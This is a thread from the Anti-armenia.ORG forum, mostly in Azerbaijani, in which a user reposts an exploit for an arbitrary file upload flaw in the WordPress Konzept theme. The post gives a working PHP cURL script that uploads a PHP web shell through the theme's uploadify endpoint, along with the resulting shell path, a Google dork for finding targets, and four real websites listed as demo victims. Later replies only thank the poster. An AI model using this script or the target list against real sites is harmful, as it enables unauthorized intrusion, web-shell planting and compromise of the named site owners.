Anti-armenia.ORG - Forumlar - WordPress Theme Konzept Arbitrary File Upload Vulnerability



Istifadəçi
    2014-09-19 09:01 GMT                 

Alper



İstifadəçi
Mesaj Sayı : 630
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : null
Ölkə :
Məslək :
Yaş : 130
Mesaj :

Mövzunu Paylaş!




Kod:
Exploit Title : WordPress Theme Konzept Arbitrary File Upload Vulnerability

Exploit Author : NULL_Pointer

Contact : https://www.facebook.com/xenith.gianni

Date : 19/09/2014

Vendor Homepage : https://github.com/nzajt/New-Life-Office/tree/master/dev/wp-content/themes/konzept

Version: 1.0

Google Dork : inurl:/wp-content/themes/konzept/

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Konzept suffers from Arbitrary File Upload Vulnerability.

Exploit :

<?php

$url = "http://127.0.0.1"; // put URL Here
$post = array
(
        "file" => "@null_pointer.jpg",
        "name" => "null_pointer.php"
);

$ch = curl_init ("$url/wp-content/themes/konzept/includes/uploadify/upload.php");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);

echo $data;

?>

Shell Path : http://127.0.0.1/wp-content/themes/konzept/includes/uploadify/uploads/null_pointer.php

Prof Video : http://www.youtube.com/watch?v=g7RaR3bCMag

Demo Sites :

http://www.ladepro.fr
http://getawayproductions.fr
http://www.victor-remere.fr
http://www.biceps-graphicdesign.fr

# C147CCAFF3C95942   1337day.com [2014-09-19]   3326DEF0807D8448 #


Mənbə: http://www.1337day.com/exploit/22667

Anti-armenia.ORG
    

Istifadəçi
    2014-09-19 16:49 GMT                 

C.e.P!



Banned
Mesaj Sayı : 188
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   13  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər..

Anti-armenia.ORG
    

Istifadəçi
    2014-09-19 18:51 GMT                 

Alper



İstifadəçi
Mesaj Sayı : 630
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : null
Ölkə :
Məslək :
Yaş : 130
Mesaj :

Mövzunu Paylaş!


Sitat
#42225 aLLiGaT0R :
Təşəkkürlər..



Xoşdur =)

Anti-armenia.ORG
    

Istifadəçi
    2014-09-20 10:08 GMT                 

C4pt41n Pr0xy



VIP
Mesaj Sayı : 1448
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Şuşa
Ölkə :
Məslək : Student
Yaş : 21
Mesaj :

Mövzunu Paylaş!


Like

http://s017.radikal.ru/i404/1202/c6/a2947080a3c4.png
Anti-armenia.ORG
    

Istifadəçi
    2014-09-20 22:56 GMT                 

PreDaToR



İstifadəçi
Mesaj Sayı : 455
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   24  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : ....................
Yaş : 33
Mesaj :

Mövzunu Paylaş!


Respect

http://s003.radikal.ru/i201/1502/48/5d4c5862c2f3.jpg
En mutlu günlerimizi en kötü kabuslara çevirenleri en tatlı rüyalarından uyandıracağız
Anti-armenia.ORG
    

Istifadəçi
    2014-09-24 13:17 GMT                 

Alper



İstifadəçi
Mesaj Sayı : 630
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   45  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : null
Ölkə :
Məslək :
Yaş : 130
Mesaj :

Mövzunu Paylaş!


Ikinci video bu movzuya aiddir


Anti-armenia.ORG
    

Istifadəçi
    2014-09-24 16:30 GMT                 

SHi3LD



Gold
Mesaj Sayı : 723
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   93  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkür

Anti-armenia.ORG